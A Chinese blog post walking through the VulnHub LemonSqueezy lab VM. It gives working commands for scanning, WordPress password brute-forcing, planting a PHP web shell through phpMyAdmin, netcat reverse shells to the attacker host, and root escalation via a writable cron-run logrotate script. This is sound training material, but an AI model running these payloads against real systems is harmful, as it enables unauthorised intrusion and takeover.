vulnhub之LemonSqueezy的实践

admin 2023年6月11日21:27:22评论29 views字数 1384阅读4分36秒阅读模式

今天实践的是vulnhub的LemonSqueezy镜像,

下载地址,https://download.vulnhub.com/lemonsqueezy/LemonSqueezy.7z,

用workstation打开,直接就在console上看到了靶机的地址,

vulnhub之LemonSqueezy的实践

做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.139,

vulnhub之LemonSqueezy的实践

有web服务,做一下目录暴破,dirb http://192.168.177.139,

获取到三个有用的url,

http://192.168.177.139/phpmyadmin

http://192.168.177.139/wordpress

http://192.168.177.139/wordpress/wp-admin

vulnhub之LemonSqueezy的实践

用wpscan扫描用户,

wpscan --url http://192.168.177.139/wordpress -e u,

获取到lemon和orange两个用户,

vulnhub之LemonSqueezy的实践

暴力破解orange用户的密码,

wpscan --url http://192.168.177.139/wordpress -U orange -P /usr/share/wordlists/rockyou.txt,

获取到密码,ginger,

vulnhub之LemonSqueezy的实践

用orange/ginger登录http://192.168.177.139/wordpress/wp-admin

获取到另一个密码,n0t1n@w0rdl1st!,

vulnhub之LemonSqueezy的实践

用orange/n0t1n@w0rdl1st!登录http://192.168.177.139/phpmyadmin,

vulnhub之LemonSqueezy的实践

新建一个数据表,注入一个web shell,

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php",

vulnhub之LemonSqueezy的实践

验证一下webshell的效果,

http://192.168.177.139/wordpress/shell.php?cmd=whoami,

vulnhub之LemonSqueezy的实践

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.177.139/wordpress/shell.php?cmd=nc -e /bin/bash 192.168.177.138 4444,

获取到反弹shell,不是root,查看到有个root权限的定时程序,

vulnhub之LemonSqueezy的实践

构造另一个反弹shell脚本,

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.177.138 lport=8888 R,

mkfifo /tmp/rvrnj; nc 192.168.177.138 8888 0</tmp/rvrnj | /bin/sh >/tmp/rvrnj 2>&1; rm /tmp/rvrnj,

kali攻击机上重新开个反弹shell监听,nc -lvp 8888,

在靶机上给程序写入反弹shell脚本,

echo "mkfifo /tmp/rvrnj; nc 192.168.177.138 8888 0</tmp/rvrnj | /bin/sh >/tmp/rvrnj 2>&1; rm /tmp/rvrnj" > logrotate,

重新获取到反弹shell,这回是root,

vulnhub之LemonSqueezy的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之LemonSqueezy的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月11日21:27:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之LemonSqueezy的实践http://cn-sec.com/archives/1796945.html

发表评论

匿名网友 填写信息